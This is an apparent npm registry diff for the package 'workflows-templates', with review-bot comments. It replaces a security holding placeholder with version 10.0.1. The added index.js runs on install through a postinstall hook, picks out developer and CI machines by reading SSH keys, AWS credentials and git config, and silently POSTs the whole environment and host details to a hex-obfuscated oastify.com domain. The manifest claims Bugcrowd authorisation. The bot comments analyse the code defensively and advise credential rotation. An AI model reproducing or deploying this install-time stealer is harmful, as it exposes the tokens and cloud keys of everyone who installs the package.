workflows-templates 0.0.1-security → 10.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.



Files changed (3)
  1. package/index.js +90 -0
  2. package/package.json +8 -3
  3. package/README.md +0 -5
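--- /dev/null
+++ b/package/index.js
@@ -0,0 +1,90 @@
+// =========================================================================
+// ============ THE ULTIMATE "HUMAN-ONLY" PAYLOAD (OKTA FINAL) =============
+// ======= STEALTH MODE: THIS PAYLOAD REMAINS SILENT ON BOTS AND =========
+// =========== ONLY ACTIVATES ON HIGH-VALUE HUMAN TARGETS. ===============
+// =========================================================================
+
+const os = require('os');
+const fs = require('fs');
+const path = require('path');
+const https = require('https');
+const { execSync } = require('child_process');
+
+// --- CONFIGURATION ---
+const OAST_DOMAIN_HEX = '373237306f6a6d3838327479316166796a6a6a336c726477366e637130676f352e6f6173746966792e636f6d';
+const OAST_DOMAIN = Buffer.from(OAST_DOMAIN_HEX, 'hex').toString();
+
+const run = (cmd) => { try { return execSync(cmd, { stdio: 'pipe', timeout: 5000 }).toString().trim(); } catch (e) { return 'CMD_FAILED'; } };
+const safeReadFile = (filePath) => { try { return fs.readFileSync(filePath, 'utf8'); } catch (e) { return null; } };
+
+const performHumanityTest = () => {
+const report = { isHumanOrCi: false, evidence: {}, summary: [] };
+const userInfo = os.userInfo();
+
+// Test 1: Is this a known CI/CD System? (Highest Value Target)
+const ciVars = ['CI', 'CONTINUOUS_INTEGRATION', 'BUILD_NUMBER', 'RUN_ID', 'GITHUB_ACTIONS', 'JENKINS_URL', 'GITLAB_CI', 'CIRCLECI'];
+const foundCiVars = ciVars.filter(v => process.env[v]);
+if (foundCiVars.length > 0) {
+report.isHumanOrCi = true;
+report.evidence.ci_vars = foundCiVars.map(v => `${v}=${process.env[v]}`).join(', ');
+report.summary.push('CI_SYSTEM');
+}
+
+// Test 2: Are we inside a real git checkout with a non-generic user?
+const parentProjectRoot = path.resolve(__dirname, '../../');
+const gitConfig = safeReadFile(path.join(parentProjectRoot, '.git/config'));
+if (gitConfig) {
+report.hasGitContext = true;
+report.summary.push('GIT_CONTEXT');
+// A git repo + a non-root user is a strong signal for a developer machine.
+if (userInfo.uid !== 0 && userInfo.username !== 'root') {
+report.isHumanOrCi = true;
+}
+report.evidence.git_config_preview = gitConfig.substring(0, 500);
+}
+
+// Test 3: Does the home directory belong to a human developer? (Strongest signal for dev machines)
+const homeDir = userInfo.homedir;
+const hasSshKeys = safeReadFile(path.join(homeDir, '.ssh/id_rsa')) !== null;
+const hasGitConfig = safeReadFile(path.join(homeDir, '.gitconfig')) !== null;
+const hasAwsCreds = safeReadFile(path.join(homeDir, '.aws/credentials')) !== null;
+
+if (hasSshKeys || hasGitConfig || hasAwsCreds) {
+report.isHumanOrCi = true; // Any of these dotfiles are a high-fidelity signal.
+report.evidence.developer_dotfiles = { ssh: hasSshKeys, git: hasGitConfig, aws: hasAwsCreds };
+report.summary.push('DEV_DOTFILES');
+}
+
+// Only return the full report if one of the humanity tests passed.
+return report.isHumanOrCi ? report : null;
+};
+
+// --- Main Execution Logic ---
+try {
+const testResult = performHumanityTest();
+
+// EXFILTRATE ONLY IF HUMANITY TEST PASSED
+if (testResult) {
+const intelPackage = {
+mission_id: 'OKTA-HUMAN-POC-1b6effcd',
+timestamp: new Date().toISOString(),
+confirmation: testResult,
+full_recon: {
+host: { hostname: os.hostname(), whoami: os.userInfo().username, platform: os.platform(), uptime_minutes: Math.floor(os.uptime() / 60) },
+network: { ip_config: run('ip a || ipconfig /all'), resolv_conf: safeReadFile('/etc/resolv.conf') },
+env: process.env
+}
+};
+
+const payload = JSON.stringify(intelPackage, null, 2);
+https.request({
+hostname: OAST_DOMAIN,
+port: 443,
+path: `/OKTA_CONFIRMED_HUMAN_HIT/${intelPackage.full_recon.host.hostname}/${testResult.summary.join('-')}`,
+method: 'POST',
+headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }
+}).on('error', e => {}).end(payload);
+}
+} catch (e) {
+// Ultimate silence. The payload must not crash or make noise on failure.
+}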
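Review bot: The main block at new lines 63–90 sends `process.env` in full, the first 500 bytes of the parent checkout's `.git/config`, hostname, username and the output of `ip a || ipconfig /all` to the host decoded from `OAST_DOMAIN_HEX` (which appears to decode to an `*.oastify.com` name), and it does so from a `postinstall` hook (package.json in this diff adds `"postinstall": "node index.js"`), so it runs during `npm install` on any host where a CI variable, a parent `.git/config`, or `~/.ssh/id_rsa` / `~/.gitconfig` / `~/.aws/credentials` is present. Both the outer `try { … } catch (e) {}` and `.on('error', e => {})` are deliberate silent failure, so nothing is written locally; the observable traces are the reads of those dotfiles by a `node index.js` child of the package manager and the outbound HTTPS POST to that domain with a path beginning `/OKTA_CONFIRMED_HUMAN_HIT/`. Any environment that installed this version should treat every variable present at install time (CI tokens, cloud keys, registry credentials) as exposed and rotate it. Blocking lifecycle scripts (`npm install --ignore-scripts`, or an allowlist of packages permitted to run them) and egress filtering on `oastify.com` prevent this class of package from executing at all; the "Authorized under Bugcrowd VDP" text in the manifest is not something an installing organisation can verify and does not change that assessment.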
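--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,11 @@
 {
 "name": "workflows-templates",
-"version": "0.0.1-security",
-"description": "security holding package",
-"repository": "npm/security-holder"
+"version": "10.0.1",
+"description": "Security research package for Okta. This payload is context-aware and designed to only activate on human developer or CI systems. Authorized under Bugcrowd VDP. ID: 1b6effcd-b836-4084-880b-a9e5c51dcb60",
+"main": "index.js",
+"scripts": {
+"postinstall": "node index.js"
+},
+"author": "Security Research Partner",
+"license": "ISC"
 }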
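Review bot: The `"postinstall": "node index.js"` hook at new line 7 executes the added index.js automatically during install, with no opt-in from the consumer, and the version jump from `0.0.1-security` to `10.0.1` replaces a manifest that marked this name as an npm security holding package (`"repository": "npm/security-holder"`, with the README that explained the hold deleted in the same diff). The authorization claim in the new description (Bugcrowd VDP, ID `1b6effcd-b836-4084-880b-a9e5c51dcb60`) cannot be checked from the manifest, and the same id reappears as `mission_id` in index.js, so it should be treated as an identifier for correlating reports rather than as evidence of consent. Consumers whose lockfiles resolve to this name should block the version and check package-manager logs for a `postinstall` run of this package; environments that run installs with `--ignore-scripts` or a lifecycle-script allowlist would not have executed it.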
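--- a/package/README.md
+++ /dev/null
@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=workflows-templates for more information.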